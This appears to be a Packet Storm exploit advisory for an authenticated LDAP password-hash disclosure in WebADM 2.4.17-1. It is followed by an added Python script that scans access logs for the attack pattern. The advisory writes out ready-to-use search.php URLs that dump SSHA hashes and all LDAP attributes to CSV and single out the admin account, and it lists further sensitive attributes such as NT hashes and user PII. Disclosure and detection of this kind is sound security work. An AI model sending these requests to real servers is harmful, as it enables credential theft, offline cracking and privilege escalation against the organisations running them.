📄 WebADM 2.4.17-1 Password Hash Disclosure

🗓️ 27 Apr 2026 00:00:00 | Reported by Chokri Hammedi | Type: packetstorm | 🔗 packetstorm.news | 👁 47 Views

Authenticated information disclosure in WebADM 2.4.17-1 leaks LDAP password hashes to admins via display parameter.

Code

    # Exploit Title: WebADM v2.4.17-1 - Authenticated LDAP Password Hash Disclosure
    # Date: 2026-04-27
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://www.rcdevs.com/
    # Software Link: https://www.rcdevs.com/downloads/
    # Version: 2.4.17-1 (Freeware Edition)
    # Tested on: Linux, WebADM Freeware Edition
    
    
    # Description:
    # WebADM v2.4.17-1 contains an authenticated information disclosure vulnerability
    # in the LDAP search functionality. The `display` parameter in search.php accepts
    # any LDAP attribute without server-side validation. A low-privileged admin can
    # retrieve SSHA password hashes for ALL LDAP users including super admins via a
    # crafted URL, enabling privilege escalation through offline hash cracking.
    
    
    # Proof of Concept:
    #
    # 1. Login to WebADM at:
    #    https://TARGET_IP:10000/admin/
    #
    # 2. After login, note the session ID in URL:
    #    https://TARGET_IP:10000/admin/SESSION_ID/index.php
    #
    # 3. Dump password hashes via direct URL:
    #
    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&display=cn,userpassword&container=dc=nodomain&filter=(objectClass=*)
    #
    # 4. Full LDAP dump (all attributes):
    #
    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&display=*&container=dc=nodomain&filter=(objectClass=*)
    #
    # 5. Export all data as CSV:
    #
    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&export=true&display=*&container=dc=nodomain&filter=(objectClass=*)
    #
    # 6. Target specific user:
    #
    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&display=*&container=dc=nodomain&filter=(cn=admin)
    #
    # Example vulnerable URL (tested on Debian):
    #
    https://192.168.1.104:10000/admin/4FWF711NQTL029JW/search.php?search=true&mode=advanced&scope=sub&display=cn,userpassword&container=dc=nodomain&filter=(objectClass=*)
    #
    # Result:
    # cn=admin,dc=nodomain
    # Password: {SSHA}2wjGZ6opxxxxxxxx
    # cn=svc_webadm,dc=nodomain
    # Password: {SSHA}3qpxxxxxx
    
    # Vulnerable Parameters in URL:
    # display=cn,userpassword    <- Accepts any LDAP attribute (no server-side filtering)
    # container=dc=nodomain      <- LDAP base DN to search
    # scope=sub                  <- Searches entire subtree
    # filter=(objectClass=*)     <- Matches all LDAP objects
    # export=true                <- Export all data to CSV file
    
    # Other sensitive attributes accessible via display parameter:
    # display=userpassword       <- SSHA password hashes
    # display=unicodepwd          <- Active Directory NT hashes
    # display=webadmData          <- Encrypted WebADM application data
    # display=webadmSettings      <- WebADM configuration settings
    # display=webadmType          <- Object type definitions
    # display=userCertificate     <- X.509 certificates
    # display=mail,mobile         <- User PII (email, phone numbers)
    # display=member,memberof     <- Group membership/privilege mapping
    # display=*                   <- ALL attributes including OpenLDAP internals
    # display=*+showall=on         <- Return all attributes including internal ones
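
For defenders, the request pattern described in the advisory can be hunted for in web access logs. The following is an added example, not part of the original advisory or of WebADM's code: it assumes combined-style access log lines that record the full query string (the page does not say how WebADM logs requests), and the names `flag_request`, `scan` and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Subset of the advisory's attribute list: credential, certificate and
# WebADM data/settings attributes (PII such as mail is left out here).
SENSITIVE = {"userpassword", "unicodepwd", "webadmdata", "webadmsettings",
             "usercertificate"}
# Assumption: combined-style access log lines with the full query string.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

def flag_request(line):
    """Return a finding for a search.php request that asks for sensitive
    attributes or a wildcard in `display`; otherwise return None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/search.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes
    requested = set()
    for value in params.get("display", []):
        # LDAP attribute names are case-insensitive; `display` is a comma list.
        requested.update(a.strip().lower() for a in value.split(",") if a.strip())
    reasons = sorted(requested & SENSITIVE)
    if any("*" in attr for attr in requested):
        reasons.append("wildcard")
    if not reasons:
        return None
    export = params.get("export", [""])[0].lower() == "true"
    return {"ip": m.group("ip"), "reasons": reasons, "export": export}

def scan(lines):
    """Return findings for every flagged line, in log order."""
    return [f for f in map(flag_request, lines) if f]

# Constructed sample lines (documentation IPs, placeholder session ID).
_BASE = "/admin/SESSIONID/search.php?search=true&mode=advanced&scope=sub"
_TAIL = "&container=dc=nodomain&filter=(objectClass=*)"
SAMPLE_LOG = [
    f'198.51.100.7 - - [27/Apr/2026:10:01:02 +0000] "GET {_BASE}&display=cn,mail{_TAIL} HTTP/1.1" 200 812',
    f'203.0.113.9 - - [27/Apr/2026:10:02:10 +0000] "GET {_BASE}&display=cn,UserPassword{_TAIL} HTTP/1.1" 200 2048',
    f'203.0.113.9 - - [27/Apr/2026:10:02:31 +0000] "GET {_BASE}&export=true&display=*{_TAIL} HTTP/1.1" 200 90112',
    f'198.51.100.7 - - [27/Apr/2026:10:03:00 +0000] "GET /admin/SESSIONID/index.php HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `export` set to true, or several findings from one source in a short window, is worth correlating with which admin account owned that session.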
